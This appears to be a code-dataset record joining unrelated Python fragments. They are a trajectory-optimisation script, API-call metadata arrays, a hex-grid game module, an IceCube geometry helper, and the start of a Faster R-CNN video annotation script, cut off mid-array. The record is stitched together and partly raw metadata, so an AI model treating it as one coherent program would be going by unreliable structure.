r = lambda z, xi, IC: np.dot(Hs(z),xi['xis'])
v = egrad(r,0)
a = egrad(v,0)
lam = lambda z, xi: np.dot(Hc(z),xi['xic'])
lamr = egrad(lam,0)
## FORM LOSS AND JACOBIAN ***********************************************************************************
L0 = lambda xi,IC: r(z,xi,IC)[0,:] - IC['R0']
Ld0 = lambda xi,IC: IC['c'] * v(z,xi,IC)[0,:] - IC['V0']
Lf = lambda xi,IC: r(z,xi,IC)[-1,:]
Ldf = lambda xi,IC: IC['c'] * v(z,xi,IC)[-1,:]
Ls = lambda xi,IC: IC['c']**2 * a(z,xi,IC) - IC['ag'] + lam(z,xi)
# Htf = lambda xi,IC: np.dot(lam(z,xi)[-1,:],(-1./2.*lam(z,xi)[-1,:] + IC['ag']))
# Updated because we need to add the lam_r * v term for the spectral method
Htf = lambda xi,IC: np.dot(lam(z,xi)[-1,:],(-1./2.*lam(z,xi)[-1,:] + IC['ag'])) \
+ np.dot(-IC['c'] *lamr(z,xi)[-1,:], IC['c'] * v(z,xi,IC)[-1,:]) + IC['Gam']
L = jit(lambda xi,IC: np.hstack(( Ls(xi,IC)[1:-1,:].flatten(), \
L0(xi,IC).flatten(), \
Ld0(xi,IC).flatten(), \
Lf(xi,IC).flatten(), \
Ldf(xi,IC).flatten() )) )
## INITIALIZE VARIABLES *************************************************************************************
xis = onp.zeros((Hs(z).shape[1],3))
xic = onp.zeros((Hc(z).shape[1],3))
if W == False:
b = np.sqrt(2)*onp.ones(1)
else:
b = np.sqrt(10)*onp.ones(1)
xi = TFCDictRobust({'xis':xis,\
'xic':xic})
IC = {'R0': np.zeros((3,)), \
'V0': np.zeros((3,)), \
'ag': np.zeros((3,)), \
'Gam': np.zeros((1,)), \
'c': 2.*onp.ones(1)}
## NONLINEAR LEAST-SQUARES CLASS *****************************************************************************
nlls = NllsClass(xi,L,maxIter=2,timer=True)
R0 = np.array([500000., 100000., 50000.])
V0 = np.array([-3000., 0., 0.])
## scale initial conditions
pscale = np.max(np.abs(R0))
tscale = pscale/np.max(np.abs(V0))
IC['R0'] = R0 / pscale
IC['V0'] = V0 * tscale/pscale
IC['ag'] = np.array([0., 0., -5.314961]) * tscale**2/pscale
IC['Gam'] = Gam * tscale**4/pscale**2
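# Note on the scaling above: positions are divided by the largest |R0| component
# (pscale) and time by tscale = pscale / max|V0|, so R0, V0, the gravity vector ag,
# and the fuel-weight term Gam are all nondimensionalized before the solve; physical
# units are restored afterwards (R * pscale, V * pscale/tscale, ...).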
global it
it = 0
def Innerloop(tf,xi,IC):
global it
IC['c'] = 2./tf
it += 1
xi,_,time = nlls.run(xi,IC)
loss1 = np.max(np.abs(L(xi,IC)))
loss2 = np.max(np.abs(Htf(xi,IC)))
return np.max(np.hstack((loss1,loss2)))
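# Note: fsolve below searches for the final time tf at which Innerloop returns zero,
# i.e. where the inner nonlinear least-squares solve simultaneously satisfies the
# dynamics/boundary residual L and the free-final-time transversality condition Htf.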
t0 = 2./IC['c']
start = timer()
tf = fsolve(Innerloop, t0, args=(xi,IC), xtol=1e-13,epsfcn=tol)
time = timer() - start
IC['c'] = 2./tf
xi,_,_ = nlls.run(xi,IC)
## CONSTRUCT SOLUTION **********************************************
t = (z-z[0])/IC['c'] * tscale
IC['Gam']= IC['Gam'] * pscale**2/tscale**4
R = r(z,xi,IC) * pscale
V = v(z,xi,IC) * pscale/tscale
LamV = lam(z,xi) * pscale/tscale**2
LamR = -IC['c'] * egrad(lam)(z,xi) * pscale/tscale**3
Ac = - LamV
Ham = onp.zeros(len(t))
int = onp.zeros(len(t))
a_mag = onp.zeros(len(t))
for i in range(0,len(t)):
int[i] = np.dot(Ac[i,:],Ac[i,:])
Ham[i] = 0.5*int[i] + np.dot(LamR[i,:],V[i,:]) + np.dot(LamV[i,:],IC['ag'] + Ac[i,:])
a_mag[i] = np.linalg.norm(Ac[i,:])
cost = IC['Gam']* t[-1] + 0.5 * simps(int,t)
loss1 = np.max(np.abs(L(xi,IC)))
loss2 = np.max(np.abs(Htf(xi,IC)))
##: print final answers to screen
print('\nFinal time [s]:\t' + str(t[-1]))
print('Cost:\t\t' + str(cost))
print('Comp time [ms]:\t' + str(time*1000))
print('Iterations:\t' + str(it))
print('Loss:\t\t' + str(np.max(np.hstack((loss1,loss2)))))
|
[
"jax.numpy.array",
"jax.numpy.dot",
"tfc.utils.egrad",
"tfc.utils.TFCDictRobust",
"time.process_time",
"scipy.optimize.fsolve",
"jax.numpy.finfo",
"jax.numpy.sqrt",
"numpy.ones",
"tfc.utils.NllsClass",
"jax.numpy.linalg.norm",
"jax.numpy.hstack",
"jax.numpy.zeros",
"jax.numpy.abs",
"tfc.utfc",
"scipy.integrate.simps"
] |
[((754, 797), 'tfc.utfc', 'utfc', (['N', 'nCx', 'ms'], {'basis': '"""CP"""', 'x0': '(-1)', 'xf': '(1.0)'}), "(N, nCx, ms, basis='CP', x0=-1, xf=1.0)\n", (758, 797), False, 'from tfc import utfc\n'), ((804, 847), 'tfc.utfc', 'utfc', (['N', 'nCy', 'mc'], {'basis': '"""CP"""', 'x0': '(-1)', 'xf': '(1.0)'}), "(N, nCy, mc, basis='CP', x0=-1, xf=1.0)\n", (808, 847), False, 'from tfc import utfc\n'), ((1100, 1111), 'tfc.utils.egrad', 'egrad', (['r', '(0)'], {}), '(r, 0)\n', (1105, 1111), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((1115, 1126), 'tfc.utils.egrad', 'egrad', (['v', '(0)'], {}), '(v, 0)\n', (1120, 1126), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((1178, 1191), 'tfc.utils.egrad', 'egrad', (['lam', '(0)'], {}), '(lam, 0)\n', (1183, 1191), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((2460, 2499), 'tfc.utils.TFCDictRobust', 'TFCDictRobust', (["{'xis': xis, 'xic': xic}"], {}), "({'xis': xis, 'xic': xic})\n", (2473, 2499), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((2787, 2826), 'tfc.utils.NllsClass', 'NllsClass', (['xi', 'L'], {'maxIter': '(2)', 'timer': '(True)'}), '(xi, L, maxIter=2, timer=True)\n', (2796, 2826), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((2830, 2869), 'jax.numpy.array', 'np.array', (['[500000.0, 100000.0, 50000.0]'], {}), '([500000.0, 100000.0, 50000.0])\n', (2838, 2869), True, 'import jax.numpy as np\n'), ((2872, 2901), 'jax.numpy.array', 'np.array', (['[-3000.0, 0.0, 0.0]'], {}), '([-3000.0, 0.0, 0.0])\n', (2880, 2901), True, 'import jax.numpy as np\n'), ((3423, 3430), 'time.process_time', 'timer', ([], {}), '()\n', (3428, 3430), True, 'from time import process_time as timer\n'), ((3436, 3496), 'scipy.optimize.fsolve', 'fsolve', (['Innerloop', 't0'], {'args': '(xi, IC)', 'xtol': '(1e-13)', 'epsfcn': 'tol'}), '(Innerloop, t0, args=(xi, IC), xtol=1e-13, epsfcn=tol)\n', (3442, 3496), False, 'from scipy.optimize import fsolve\n'), ((382, 397), 'jax.numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (390, 397), True, 'import jax.numpy as np\n'), ((2532, 2546), 'jax.numpy.zeros', 'np.zeros', (['(3,)'], {}), '((3,))\n', (2540, 2546), True, 'import jax.numpy as np\n'), ((2562, 2576), 'jax.numpy.zeros', 'np.zeros', (['(3,)'], {}), '((3,))\n', (2570, 2576), True, 'import jax.numpy as np\n'), ((2592, 2606), 'jax.numpy.zeros', 'np.zeros', (['(3,)'], {}), '((3,))\n', (2600, 2606), True, 'import jax.numpy as np\n'), ((2623, 2637), 'jax.numpy.zeros', 'np.zeros', (['(1,)'], {}), '((1,))\n', (2631, 2637), True, 'import jax.numpy as np\n'), ((2943, 2953), 'jax.numpy.abs', 'np.abs', (['R0'], {}), '(R0)\n', (2949, 2953), True, 'import jax.numpy as np\n'), ((3502, 3509), 'time.process_time', 'timer', ([], {}), '()\n', (3507, 3509), True, 'from time import process_time as timer\n'), ((3978, 4004), 'jax.numpy.dot', 'np.dot', (['Ac[i, :]', 'Ac[i, :]'], {}), '(Ac[i, :], Ac[i, :])\n', (3984, 4004), True, 'import jax.numpy as np\n'), ((4107, 4131), 'jax.numpy.linalg.norm', 'np.linalg.norm', (['Ac[i, :]'], {}), '(Ac[i, :])\n', (4121, 4131), True, 'import jax.numpy as np\n'), ((2392, 2402), 'jax.numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (2399, 2402), True, 'import jax.numpy as np\n'), ((2403, 2414), 'numpy.ones', 'onp.ones', (['(1)'], {}), '(1)\n', (2411, 2414), True, 'import numpy as onp\n'), ((2429, 2440), 'jax.numpy.sqrt', 'np.sqrt', (['(10)'], {}), '(10)\n', (2436, 2440), True, 'import jax.numpy as np\n'), 
((2441, 2452), 'numpy.ones', 'onp.ones', (['(1)'], {}), '(1)\n', (2449, 2452), True, 'import numpy as onp\n'), ((2655, 2666), 'numpy.ones', 'onp.ones', (['(1)'], {}), '(1)\n', (2663, 2666), True, 'import numpy as onp\n'), ((2978, 2988), 'jax.numpy.abs', 'np.abs', (['V0'], {}), '(V0)\n', (2984, 2988), True, 'import jax.numpy as np\n'), ((3064, 3095), 'jax.numpy.array', 'np.array', (['[0.0, 0.0, -5.314961]'], {}), '([0.0, 0.0, -5.314961])\n', (3072, 3095), True, 'import jax.numpy as np\n'), ((3370, 3395), 'jax.numpy.hstack', 'np.hstack', (['(loss1, loss2)'], {}), '((loss1, loss2))\n', (3379, 3395), True, 'import jax.numpy as np\n'), ((4055, 4094), 'jax.numpy.dot', 'np.dot', (['LamV[i, :]', "(IC['ag'] + Ac[i, :])"], {}), "(LamV[i, :], IC['ag'] + Ac[i, :])\n", (4061, 4094), True, 'import jax.numpy as np\n'), ((4165, 4178), 'scipy.integrate.simps', 'simps', (['int', 't'], {}), '(int, t)\n', (4170, 4178), False, 'from scipy.integrate import simps\n'), ((4028, 4055), 'jax.numpy.dot', 'np.dot', (['LamR[i, :]', 'V[i, :]'], {}), '(LamR[i, :], V[i, :])\n', (4034, 4055), True, 'import jax.numpy as np\n'), ((3815, 3825), 'tfc.utils.egrad', 'egrad', (['lam'], {}), '(lam)\n', (3820, 3825), False, 'from tfc.utils import TFCDictRobust, egrad, NllsClass, MakePlot\n'), ((4465, 4490), 'jax.numpy.hstack', 'np.hstack', (['(loss1, loss2)'], {}), '((loss1, loss2))\n', (4474, 4490), True, 'import jax.numpy as np\n')]
|
"""
Data
================
Data storage and manipulation classes; these should be sufficient to run the game without a display.
"""
from enum import Enum
import numpy
class Facing(Enum):
YP = 0
XP = 1
ZN = 2
YN = 3
XN = 4
ZP = 5
# gives a directional delta array in hex coordinates for given Facing
def facing_array(enum):
if enum == Facing.YP:
return [0, 1, 0]
if enum == Facing.XP:
return [1, 0, 0]
if enum == Facing.ZN:
return [0, 0, -1]
if enum == Facing.YN:
return [0, -1, 0]
if enum == Facing.XN:
return [-1, 0, 0]
if enum == Facing.ZP:
return [0, 0, 1]
raise Exception(f'{enum} is not a valid Facing')
class Body:
def __init__(self, position=None, momentum=None, facing=Facing.YP, image=''):
if momentum is None:
momentum = [0, 0, 0]
if position is None:
position = [[0, 0]]
self.facing = facing
self.position = position # hex x y positions
self.momentum = momentum # hex x y z velocities
self._momentum_next = [0, 0, 0] # hex x y z velocities
self.image = image
# single hex movement by provided direction, none or 0 for inaction
def move(self, direction=None):
if direction is None:
direction = [0, 0, 0]
else:
direction = facing_array(direction)
        self.position = numpy.add(self.position, direction)
        self._momentum_next = numpy.add(self._momentum_next, direction)
# positive rotations are clockwise
def rotate(self, rotations, pivot=None):
if pivot is None:
pivot = self.position[0]
        self.facing = Facing((self.facing.value + rotations) % 6)
if len(self.position) > 1:
for r in range(0, abs(rotations)):
if rotations > 0:
for i in range(0, len(self.position)):
p = numpy.subtract(self.position[i], pivot)
p = [-p[2], -p[0], -p[1]]
self.position[i] = numpy.add(p, pivot)
else:
for i in range(0, len(self.position)):
p = numpy.subtract(self.position[i], pivot)
                        p = [-p[1], -p[2], -p[0]]
self.position[i] = numpy.add(p, pivot)
# 1 = 60°, 6 rotations in a 360° turn
def degree_facing(self):
        return self.facing.value * 60
def elapse_turn(self):
self.momentum = self._momentum_next
self._momentum_next = [0, 0, 0]
class Ship(Body):
def __init__(self, position=None, momentum=None, facing=Facing.YP,
image='', speed=1, rotation_speed=1, move_directions=[Facing.YP]):
super().__init__(position, momentum, facing, image)
self.speed = speed # number of movement/rotation actions you can make in a turn
self.action_points = speed
self.rotation_speed = rotation_speed # number of 60 degree turns allowed in one rotation action
self.move_directions = move_directions # legal directions to make moves in
def move(self, direction=None):
if direction is None:
direction = [0, 0, 0]
elif direction in self.move_directions:
            super().move(direction)
else:
raise Exception(f'Invalid move direction {direction}, valid directions are {self.move_directions}')
self.action_points -= 1
def rotate(self, rotations, pivot=None):
return
class Map:
def __init__(self, width, height):
self.width = width
self.height = height
self.bodies = []
# NOTES FROM INITIAL GAME PLAY MECHANICS REVIEW:
#
# Body():
# (x, y)[]
# position
# (x1, x2, y)
# momentum
# (x1, x2, y)
# momentum_next
#
#
# def rotate((x, y)pivot, rotations
#
# ):
#
# # updates position
#
# def move((x1, x2, y)direction
#
# ):
# # updates position and momentum_next
#
#
# ImmutableBody(Body):
#
#
# def rotate((x, y)pivot, rotations
#
# ):
# return
#
#
# def move((x1, x2, y)direction
#
# ):
# return
#
# Ship(Body):
# rotation_speed
# speed
# Facing[]
# legal_moves # which direction thrusters can take us, 1 non zero value in tuple
#
#
# def rotate((x, y)pivot, rotations
#
# ):
# # if you rotate your legal_moves must update
#
#
# Map():
# x_width
# y_width
# []
# bodies
#
#
# class Facing(Enum):
# YP = 0
# X1P = 1
# X2P = 2
# YN = 3
# X1N = 4
# X2N = 5
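# Minimal usage sketch (hedged): the starting position and the single +Y thrust
# below are assumptions chosen only to illustrate move() and elapse_turn().
if __name__ == '__main__':
    ship = Ship(position=[[0, 0, 0]], move_directions=[Facing.YP])
    ship.move(Facing.YP)   # thrust one hex along +Y; also queues momentum for next turn
    ship.elapse_turn()     # the queued momentum becomes the live momentum
    print(ship.position, ship.momentum)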
|
[
"numpy.add",
"numpy.subtract"
] |
[((1398, 1433), 'numpy.add', 'numpy.add', (['self.position', 'direction'], {}), '(self.position, direction)\n', (1407, 1433), False, 'import numpy\n'), ((1442, 1482), 'numpy.add', 'numpy.add', (['self.momentum_next', 'direction'], {}), '(self.momentum_next, direction)\n', (1451, 1482), False, 'import numpy\n'), ((1867, 1906), 'numpy.subtract', 'numpy.subtract', (['self.position[i]', 'pivot'], {}), '(self.position[i], pivot)\n', (1881, 1906), False, 'import numpy\n'), ((2000, 2019), 'numpy.add', 'numpy.add', (['p', 'pivot'], {}), '(p, pivot)\n', (2009, 2019), False, 'import numpy\n'), ((2129, 2168), 'numpy.subtract', 'numpy.subtract', (['self.position[i]', 'pivot'], {}), '(self.position[i], pivot)\n', (2143, 2168), False, 'import numpy\n'), ((2263, 2282), 'numpy.add', 'numpy.add', (['p', 'pivot'], {}), '(p, pivot)\n', (2272, 2282), False, 'import numpy\n')]
|
from icecube.icetray import OMKey
from icecube.simclasses import I3MapModuleKeyI3ExtraGeometryItemCylinder, I3ExtraGeometryItemCylinder
from icecube.dataclasses import I3Position, ModuleKey
from I3Tray import I3Units
import numpy as np
from os.path import expandvars
from_cable_shadow = expandvars("$I3_BUILD/ice-models/resources/models/cable_position/orientation.cable_shadow.txt")
from_led7 = expandvars("$I3_BUILD/ice-models/resources/models/cable_position/orientation.led7.txt")
def GetIceCubeCableShadow(CableAngles=from_led7,
DOMRadius=165.1*I3Units.mm, CableRadius=23*I3Units.mm, CableLength=1*I3Units.m):
"""
Get a cylinder representing the position of the cable at each DOM
:param CableAngles: text file containing string, om, angle (degrees), angle error (degrees)
:param DOMRadius: radius of the DOM sphere
:param CableRadius: radius of the cable
:param CableLength: length of the cable segment at each DOM
:returns: a map of I3ExtraGeometryItem representing the local position of
the cable *in DOM-centered coordinates*
"""
# assume the cable runs along the surface of the DOM
radius = DOMRadius + CableRadius
shadows = I3MapModuleKeyI3ExtraGeometryItemCylinder()
for string, om, angle, _ in np.loadtxt(CableAngles, dtype=[('string',int),('om',int),('angle',float),('angle_err',float)]):
pos = I3Position(radius*np.cos(np.radians(angle)), radius*np.sin(np.radians(angle)), 0)
shadows[ModuleKey(int(string),int(om))] = I3ExtraGeometryItemCylinder(pos + I3Position(0,0,CableLength/2.), pos + I3Position(0,0,-CableLength/2.), CableRadius)
return shadows
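# Hedged usage sketch: build the default (LED7-derived) cable map and report its size.
# Assumes the icetray / simclasses bindings imported above are available in this environment.
if __name__ == "__main__":
    shadows = GetIceCubeCableShadow()
    print("cable shadow cylinders generated for %d optical modules" % len(shadows))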
|
[
"icecube.simclasses.I3MapModuleKeyI3ExtraGeometryItemCylinder",
"numpy.radians",
"os.path.expandvars",
"icecube.dataclasses.I3Position",
"numpy.loadtxt"
] |
[((291, 396), 'os.path.expandvars', 'expandvars', (['"""$I3_BUILD/ice-models/resources/models/cable_position/orientation.cable_shadow.txt"""'], {}), "(\n '$I3_BUILD/ice-models/resources/models/cable_position/orientation.cable_shadow.txt'\n )\n", (301, 396), False, 'from os.path import expandvars\n'), ((399, 496), 'os.path.expandvars', 'expandvars', (['"""$I3_BUILD/ice-models/resources/models/cable_position/orientation.led7.txt"""'], {}), "(\n '$I3_BUILD/ice-models/resources/models/cable_position/orientation.led7.txt'\n )\n", (409, 496), False, 'from os.path import expandvars\n'), ((1198, 1241), 'icecube.simclasses.I3MapModuleKeyI3ExtraGeometryItemCylinder', 'I3MapModuleKeyI3ExtraGeometryItemCylinder', ([], {}), '()\n', (1239, 1241), False, 'from icecube.simclasses import I3MapModuleKeyI3ExtraGeometryItemCylinder, I3ExtraGeometryItemCylinder\n'), ((1274, 1379), 'numpy.loadtxt', 'np.loadtxt', (['CableAngles'], {'dtype': "[('string', int), ('om', int), ('angle', float), ('angle_err', float)]"}), "(CableAngles, dtype=[('string', int), ('om', int), ('angle',\n float), ('angle_err', float)])\n", (1284, 1379), True, 'import numpy as np\n'), ((1550, 1585), 'icecube.dataclasses.I3Position', 'I3Position', (['(0)', '(0)', '(CableLength / 2.0)'], {}), '(0, 0, CableLength / 2.0)\n', (1560, 1585), False, 'from icecube.dataclasses import I3Position, ModuleKey\n'), ((1588, 1624), 'icecube.dataclasses.I3Position', 'I3Position', (['(0)', '(0)', '(-CableLength / 2.0)'], {}), '(0, 0, -CableLength / 2.0)\n', (1598, 1624), False, 'from icecube.dataclasses import I3Position, ModuleKey\n'), ((1409, 1426), 'numpy.radians', 'np.radians', (['angle'], {}), '(angle)\n', (1419, 1426), True, 'import numpy as np\n'), ((1443, 1460), 'numpy.radians', 'np.radians', (['angle'], {}), '(angle)\n', (1453, 1460), True, 'import numpy as np\n')]
|
import itertools
import operator
import os
import pickle
import re
import sys
import time
import cv2
from keras import backend as K
from keras.layers import Input
from keras.models import Model
import skvideo.io
from keras_frcnn import roi_helpers
import keras_frcnn.resnet as nn
import numpy as np
video_folder = '../../Videos/'
videoName = "MOV_0861"
input_video_file = os.path.abspath(video_folder + videoName + ".mp4")
output_video_file = os.path.abspath(video_folder + "OUTPUT/" + videoName + ".mp4")
img_path = os.path.join(video_folder +"OUTPUT/input", '')
output_path = os.path.join(video_folder +"OUTPUT/output", '')
num_rois = 32
frame_rate = 30
def cleanup():
print("cleaning up...")
os.popen('rm -f ' + img_path + '*')
os.popen('rm -f ' + output_path + '*')
def get_file_names(search_path):
for (dirpath, _, filenames) in os.walk(search_path):
for filename in filenames:
yield filename # os.path.join(dirpath, filename)
def convert_to_images():
counter = 0
videodata = skvideo.io.vreader(input_video_file)
for frame in videodata:
skvideo.io.vwrite(os.path.join(img_path, str(counter) + '.jpg'), frame)
counter = counter + 1
def save_to_video():
list_files = sorted(get_file_names(output_path), key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
    # start the FFmpeg writing subprocess with the following parameters
writer = skvideo.io.FFmpegWriter(output_video_file, outputdict={
'-vcodec': 'libx264', "-r":str(frame_rate)}, verbosity=1)
for file in list_files:
frame = skvideo.io.vread(os.path.join(output_path, file))
writer.writeFrame(frame)
writer.close()
def format_img(img, C):
img_min_side = float(C.im_size)
(height, width, _) = img.shape
if width <= height:
f = img_min_side / width
new_height = int(f * height)
new_width = int(img_min_side)
else:
f = img_min_side / height
new_width = int(f * width)
new_height = int(img_min_side)
img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)
img = img[:, :, (2, 1, 0)]
img = img.astype(np.float32)
img[:, :, 0] -= C.img_channel_mean[0]
img[:, :, 1] -= C.img_channel_mean[1]
img[:, :, 2] -= C.img_channel_mean[2]
img /= C.img_scaling_factor
img = np.transpose(img, (2, 0, 1))
img = np.expand_dims(img, axis=0)
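    # resulting shape is (1, 3, new_height, new_width); main() transposes this to
    # (1, H, W, 3) when the backend reports TensorFlow dimension ordering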
return img
def accumulate(l):
it = itertools.groupby(l, operator.itemgetter(0))
for key, subiter in it:
yield key, sum(item[1] for item in subiter)
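# e.g. list(accumulate([('car', 1), ('car', 1), ('person', 1)])) -> [('car', 2), ('person', 1)]
# note groupby only merges consecutive keys, which holds here because all_objects is
# appended class by class in main()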
def main():
sys.setrecursionlimit(40000)
config_output_filename = './config.pickle'
with open(config_output_filename, 'rb') as f_in:
C = pickle.load(f_in)
# turn off any data augmentation at test time
C.use_horizontal_flips = False
C.use_vertical_flips = False
C.rot_90 = False
class_mapping = C.class_mapping
if 'bg' not in class_mapping:
class_mapping['bg'] = len(class_mapping)
class_mapping = {v: k for k, v in class_mapping.items()}
print(class_mapping)
class_to_color = {class_mapping[v]: np.random.randint(0, 255, 3).tolist() for v in class_mapping}
C.num_rois = num_rois
if K.image_dim_ordering() == 'th':
input_shape_img = (3, None, None)
input_shape_features = (1024, None, None)
else:
input_shape_img = (None, None, 3)
input_shape_features = (None, None, 1024)
img_input = Input(shape=input_shape_img)
roi_input = Input(shape=(C.num_rois, 4))
feature_map_input = Input(shape=input_shape_features)
# define the base network (resnet here, can be VGG, Inception, etc)
shared_layers = nn.nn_base(img_input, trainable=True)
# define the RPN, built on the base layers
num_anchors = len(C.anchor_box_scales) * len(C.anchor_box_ratios)
rpn_layers = nn.rpn(shared_layers, num_anchors)
classifier = nn.classifier(feature_map_input, roi_input, C.num_rois, nb_classes=len(class_mapping), trainable=True)
model_rpn = Model(img_input, rpn_layers)
model_classifier_only = Model([feature_map_input, roi_input], classifier)
model_classifier = Model([feature_map_input, roi_input], classifier)
model_rpn.load_weights(C.model_path, by_name=True)
model_classifier.load_weights(C.model_path, by_name=True)
model_rpn.compile(optimizer='sgd', loss='mse')
model_classifier.compile(optimizer='sgd', loss='mse')
bbox_threshold = 0.8
print("anotating...")
list_files = sorted(get_file_names(img_path), key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
for img_name in list_files:
if not img_name.lower().endswith(('.bmp', '.jpeg', '.jpg', '.png', '.tif', '.tiff')):
continue
print(img_name)
st = time.time()
filepath = os.path.join(img_path, img_name)
img = cv2.imread(filepath)
X = format_img(img, C)
img_scaled = np.transpose(X.copy()[0, (2, 1, 0), :, :], (1, 2, 0)).copy()
img_scaled[:, :, 0] += 123.68
img_scaled[:, :, 1] += 116.779
img_scaled[:, :, 2] += 103.939
img_scaled = img_scaled.astype(np.uint8)
if K.image_dim_ordering() == 'tf':
X = np.transpose(X, (0, 2, 3, 1))
# get the feature maps and output from the RPN
[Y1, Y2, F] = model_rpn.predict(X)
R = roi_helpers.rpn_to_roi(Y1, Y2, C, K.image_dim_ordering(), overlap_thresh=0.7)
# convert from (x1,y1,x2,y2) to (x,y,w,h)
R[:, 2] -= R[:, 0]
R[:, 3] -= R[:, 1]
# apply the spatial pyramid pooling to the proposed regions
bboxes = {}
probs = {}
for jk in range(R.shape[0] // C.num_rois + 1):
ROIs = np.expand_dims(R[C.num_rois * jk:C.num_rois * (jk + 1), :], axis=0)
if ROIs.shape[1] == 0:
break
if jk == R.shape[0] // C.num_rois:
# pad R
curr_shape = ROIs.shape
target_shape = (curr_shape[0], C.num_rois, curr_shape[2])
ROIs_padded = np.zeros(target_shape).astype(ROIs.dtype)
ROIs_padded[:, :curr_shape[1], :] = ROIs
ROIs_padded[0, curr_shape[1]:, :] = ROIs[0, 0, :]
ROIs = ROIs_padded
[P_cls, P_regr] = model_classifier_only.predict([F, ROIs])
for ii in range(P_cls.shape[1]):
if np.max(P_cls[0, ii, :]) < bbox_threshold or np.argmax(P_cls[0, ii, :]) == (P_cls.shape[2] - 1):
continue
cls_name = class_mapping[np.argmax(P_cls[0, ii, :])]
if cls_name not in bboxes:
bboxes[cls_name] = []
probs[cls_name] = []
(x, y, w, h) = ROIs[0, ii, :]
cls_num = np.argmax(P_cls[0, ii, :])
try:
(tx, ty, tw, th) = P_regr[0, ii, 4 * cls_num:4 * (cls_num + 1)]
tx /= C.classifier_regr_std[0]
ty /= C.classifier_regr_std[1]
tw /= C.classifier_regr_std[2]
th /= C.classifier_regr_std[3]
x, y, w, h = roi_helpers.apply_regr(x, y, w, h, tx, ty, tw, th)
except:
pass
bboxes[cls_name].append([16 * x, 16 * y, 16 * (x + w), 16 * (y + h)])
probs[cls_name].append(np.max(P_cls[0, ii, :]))
all_dets = []
all_objects = []
for key in bboxes:
bbox = np.array(bboxes[key])
new_boxes, new_probs = roi_helpers.non_max_suppression_fast(bbox, np.array(probs[key]), overlap_thresh=0.5)
for jk in range(new_boxes.shape[0]):
(x1, y1, x2, y2) = new_boxes[jk, :]
cv2.rectangle(img_scaled, (x1, y1), (x2, y2), class_to_color[key], 2)
textLabel = '{}: {}'.format(key, int(100 * new_probs[jk]))
all_dets.append((key, 100 * new_probs[jk]))
all_objects.append((key, 1))
(retval, baseLine) = cv2.getTextSize(textLabel, cv2.FONT_HERSHEY_COMPLEX, 1, 1)
textOrg = (x1, y1 - 0)
cv2.rectangle(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (0, 0, 0), 2)
cv2.rectangle(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (255, 255, 255), -1)
cv2.putText(img_scaled, textLabel, textOrg, cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 0), 1)
print('Elapsed time = {}'.format(time.time() - st))
height, width, channels = img_scaled.shape
cv2.rectangle(img_scaled, (0, 0), (width, 30), (0, 0, 0), -1)
cv2.putText(img_scaled, "Obj count: " + str(list(accumulate(all_objects))), (5, 19), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255), 1)
cv2.imwrite(os.path.join(output_path, img_name), img_scaled)
print(all_dets)
if __name__ == '__main__':
cleanup()
print("Converting video to images..")
convert_to_images()
print("Main ...")
main()
print("saving to video..")
save_to_video()
|
[
"numpy.argmax",
"os.popen",
"os.walk",
"keras.models.Model",
"keras.backend.image_dim_ordering",
"pickle.load",
"numpy.random.randint",
"cv2.rectangle",
"keras.layers.Input",
"sys.setrecursionlimit",
"os.path.join",
"os.path.abspath",
"numpy.transpose",
"numpy.max",
"re.findall",
"cv2.resize",
"cv2.putText",
"cv2.getTextSize",
"numpy.zeros",
"numpy.expand_dims",
"time.time",
"cv2.imread",
"numpy.array",
"keras_frcnn.resnet.nn_base",
"keras_frcnn.resnet.rpn",
"keras_frcnn.roi_helpers.apply_regr",
"operator.itemgetter"
] |
[((375, 425), 'os.path.abspath', 'os.path.abspath', (["(video_folder + videoName + '.mp4')"], {}), "(video_folder + videoName + '.mp4')\n", (390, 425), False, 'import os\n'), ((446, 508), 'os.path.abspath', 'os.path.abspath', (["(video_folder + 'OUTPUT/' + videoName + '.mp4')"], {}), "(video_folder + 'OUTPUT/' + videoName + '.mp4')\n", (461, 508), False, 'import os\n'), ((520, 567), 'os.path.join', 'os.path.join', (["(video_folder + 'OUTPUT/input')", '""""""'], {}), "(video_folder + 'OUTPUT/input', '')\n", (532, 567), False, 'import os\n'), ((581, 629), 'os.path.join', 'os.path.join', (["(video_folder + 'OUTPUT/output')", '""""""'], {}), "(video_folder + 'OUTPUT/output', '')\n", (593, 629), False, 'import os\n'), ((702, 737), 'os.popen', 'os.popen', (["('rm -f ' + img_path + '*')"], {}), "('rm -f ' + img_path + '*')\n", (710, 737), False, 'import os\n'), ((739, 777), 'os.popen', 'os.popen', (["('rm -f ' + output_path + '*')"], {}), "('rm -f ' + output_path + '*')\n", (747, 777), False, 'import os\n'), ((845, 865), 'os.walk', 'os.walk', (['search_path'], {}), '(search_path)\n', (852, 865), False, 'import os\n'), ((1964, 2035), 'cv2.resize', 'cv2.resize', (['img', '(new_width, new_height)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n', (1974, 2035), False, 'import cv2\n'), ((2247, 2275), 'numpy.transpose', 'np.transpose', (['img', '(2, 0, 1)'], {}), '(img, (2, 0, 1))\n', (2259, 2275), True, 'import numpy as np\n'), ((2283, 2310), 'numpy.expand_dims', 'np.expand_dims', (['img'], {'axis': '(0)'}), '(img, axis=0)\n', (2297, 2310), True, 'import numpy as np\n'), ((2483, 2511), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(40000)'], {}), '(40000)\n', (2504, 2511), False, 'import sys\n'), ((3288, 3316), 'keras.layers.Input', 'Input', ([], {'shape': 'input_shape_img'}), 